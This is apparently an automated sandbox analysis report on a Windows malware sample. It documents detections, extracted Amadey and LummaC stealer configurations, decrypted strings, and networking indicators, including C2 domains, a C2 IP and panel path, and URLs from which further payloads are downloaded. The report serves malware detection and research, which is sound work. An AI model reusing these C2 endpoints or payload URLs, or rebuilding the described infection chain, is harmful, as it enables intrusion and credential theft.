                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
                                Found malware configuration
                                Source: 00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                Source: 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "immureprech.biz", "bellflamre.click", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "effecterectz.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\Public\Netstat\FuturreApp.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Netstat\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeReversingLabs: Detection: 80%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exeReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exeReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exeReversingLabs: Detection: 18%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exeReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exeReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exeReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exeReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exeReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exeReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exeReversingLabs: Detection: 18%
                                Source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exeReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exeReversingLabs: Detection: 80%
                                Source: C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exeReversingLabs: Detection: 54%
                                Multi AV Scanner detection for submitted file
                                Source: file.exeReversingLabs: Detection: 47%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: file.exeJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bellflamre.click
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--nbgnxdlxdnyo
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile opened: C:\Users\Public\Netstat\msvcr100.dll
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: m9sfEU9.exe, 00000051.00000000.2623878059.0000000000160000.00000002.00000001.01000000.0000001F.sdmp, m9sfEU9.exe, 00000051.00000002.2648520740.0000000000160000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: FuturreApp.exe, 00000055.00000002.7290420572.000000006C002000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: D1UL0FG.exe, 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: D1UL0FG.exe
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: FuturreApp.exe, 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, FuturreApp.exe, 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A8A22000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000063.00000002.2839636582.00007FF62B1A0000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013531293.00007FF8BFAD1000.00000040.00000001.01000000.00000014.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdbhP source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7289151898.000000006BF21000.00000020.00000001.01000000.00000026.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: D1UL0FG.exe, 00000005.00000003.2466075988.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3014816312.00007FF8BFBA1000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3014453254.00007FF8BFB61000.00000040.00000001.01000000.0000000D.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008792565.00007FF8B90E1000.00000040.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013206314.00007FF8BFAB1000.00000040.00000001.01000000.00000019.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3012961847.00007FF8BA24D000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: FuturreApp.exe, 00000055.00000002.7289981712.000000006BFE5000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3011122158.00007FF8B9131000.00000040.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3012153000.00007FF8B93C1000.00000040.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewText.pdb source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5971400666.0000000001402000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdb source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: number of queries: 1001
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: number of queries: 1001
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED92F0 FindFirstFileExW,FindClose,5_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED92F0 FindFirstFileExW,FindClose,6_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF67AEF18E4

                                Networking

                                barindex
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: awake-weaves.cyou
                                Source: Malware configuration extractorURLs: immureprech.biz
                                Source: Malware configuration extractorURLs: bellflamre.click
                                Source: Malware configuration extractorURLs: debonairnukk.xyz
                                Source: Malware configuration extractorURLs: diffuculttan.xyz
                                Source: Malware configuration extractorURLs: deafeninggeh.biz
                                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                                Source: Malware configuration extractorURLs: effecterectz.xyz
                                Source: Malware configuration extractorIPs: 185.215.113.43
                                Yara detected Generic Downloader
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, type: DROPPED
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026E0C0 recv,recv,recv,recv,0_2_0026E0C0
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=a44515e6f9fc86eb9935a7da; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 19 Dec 2024 21:11:10 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: et https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: http://%s/testpage.htm
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://127.0.0.1
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe/
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                                Source: skotes.exe, 00000003.00000003.5971400666.000000000139C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
                                Source: skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8001
                                Source: skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
